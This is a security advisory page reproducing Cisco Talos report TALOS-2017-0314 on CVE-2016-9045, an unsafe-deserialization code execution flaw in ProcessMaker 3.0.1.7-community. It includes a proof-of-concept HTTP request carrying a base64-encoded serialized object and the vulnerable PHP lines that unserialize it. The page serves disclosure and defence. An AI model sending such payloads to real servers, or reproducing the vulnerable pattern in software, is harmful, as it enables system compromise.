Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2016-9045: TALOS-2017-0314 || Cisco Talos Intelligence Group

A code execution vulnerability exists in ProcessMaker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

CVE
#vulnerability#web#windows#cisco#intel#php#perl#auth#firefox

Summary

A code execution vulnerability exists in ProcessMarker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

Tested Versions

ProcessMaker Enterprise Core 3.0.1.7-community

Product URLs

https://www.processmaker.com/community-2

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Details

It was discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type.

The following Proof Of Concept request demonstrate the issue:

GET /sysworkflow/en/neoclassic/login/sysLoginVerify.php?    
d=TzoxNToiTXlTUUxDb25uZWN0aW9uIjoyOntzOjY6IgAqAGRzbiI7TjtzOjg6IgAqAGZsYWdzIjtpOjA7fQ== 
HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.56.101/sysworkflow/en/neoclassic/login/login?
u=%2Fsysworkflow%2Fen%2Fneoclassic%2Fadmin%2FpmLogo
Connection: close

The following code was found to be responsible for unsafe deserialization:

26 if (array_key_exists("d", $_GET)) {
27     $_POST = unserialize(base64_decode($_GET["d"]));
28  
29 }
30
31 if (! isset ($_POST)) {
32     G::header('location: /sys/' . $lang . '/' . SYS_SKIN . '/' . 'login/login');
33 }
34 if (isset($_SESSION['sysLogin'])) {
35     $_POST['form'] = $_SESSION['sysLogin'];
36 }
37
38 require_once 'authentication.php';
39

Mitigation

Restrict access to known, trusted users and hosts.

Timeline

2016-04-28 - Vendor Disclosure
2017-07-19 - Public Release

Discovered by Jerzy Kramarz of Portcullis Computer Security Limited.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907